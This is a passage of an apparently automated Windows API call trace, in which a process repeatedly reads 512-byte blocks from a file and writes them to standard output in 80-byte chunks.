[0098.629] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.630] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.630] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] GetFileType (hFile=0x4c) returned 0x1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] GetFileType (hFile=0x4c) returned 0x1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] GetFileType (hFile=0x4c) returned 0x1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] GetFileType (hFile=0x4c) returned 0x1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 
[0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] GetFileType (hFile=0x4c) returned 0x1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] GetFileType (hFile=0x4c) returned 0x1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] GetFileType (hFile=0x4c) returned 0x1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] GetFileType (hFile=0x4c) returned 0x1 [0098.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.630] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.631] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, 
lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] GetFileType (hFile=0x4c) returned 0x1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] GetFileType (hFile=0x4c) returned 0x1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] GetFileType (hFile=0x4c) returned 0x1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] GetFileType (hFile=0x4c) returned 0x1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] GetFileType (hFile=0x4c) returned 0x1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] GetFileType (hFile=0x4c) returned 0x1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] GetFileType (hFile=0x4c) returned 0x1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] GetFileType (hFile=0x4c) returned 0x1 [0098.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.631] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.632] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] GetFileType (hFile=0x4c) returned 0x1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] GetFileType (hFile=0x4c) returned 0x1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] GetFileType 
(hFile=0x4c) returned 0x1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] GetFileType (hFile=0x4c) returned 0x1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] GetFileType (hFile=0x4c) returned 0x1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] GetFileType (hFile=0x4c) returned 0x1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] GetFileType (hFile=0x4c) returned 0x1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.632] GetFileType (hFile=0x4c) returned 0x1 [0098.632] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.633] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.633] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] GetFileType (hFile=0x4c) returned 0x1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] GetFileType (hFile=0x4c) returned 0x1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] GetFileType (hFile=0x4c) returned 0x1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] GetFileType (hFile=0x4c) returned 0x1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, 
lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] GetFileType (hFile=0x4c) returned 0x1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] GetFileType (hFile=0x4c) returned 0x1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] GetFileType (hFile=0x4c) returned 0x1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] GetFileType (hFile=0x4c) returned 0x1 [0098.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.633] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.634] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] GetFileType (hFile=0x4c) returned 0x1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] GetFileType (hFile=0x4c) returned 0x1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] GetFileType (hFile=0x4c) returned 0x1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] GetFileType (hFile=0x4c) returned 0x1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] GetFileType (hFile=0x4c) returned 0x1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] GetFileType (hFile=0x4c) returned 0x1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] WriteFile (in: 
hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] GetFileType (hFile=0x4c) returned 0x1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] GetFileType (hFile=0x4c) returned 0x1 [0098.634] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.634] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.635] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.635] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] GetFileType (hFile=0x4c) returned 0x1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] GetFileType (hFile=0x4c) returned 0x1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.635] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0098.635] GetFileType (hFile=0x4c) returned 0x1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] GetFileType (hFile=0x4c) returned 0x1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] GetFileType (hFile=0x4c) returned 0x1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] GetFileType (hFile=0x4c) returned 0x1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] GetFileType (hFile=0x4c) returned 0x1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0098.635] GetFileType (hFile=0x4c) returned 0x1 [0098.635] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.635] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.636] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.636] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] GetFileType (hFile=0x4c) returned 0x1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] GetFileType (hFile=0x4c) returned 0x1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] GetFileType (hFile=0x4c) returned 0x1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] GetFileType (hFile=0x4c) returned 0x1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, 
lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] GetFileType (hFile=0x4c) returned 0x1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] GetFileType (hFile=0x4c) returned 0x1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] GetFileType (hFile=0x4c) returned 0x1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.636] GetFileType (hFile=0x4c) returned 0x1 [0098.636] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.637] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.637] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.637] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.637] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, 
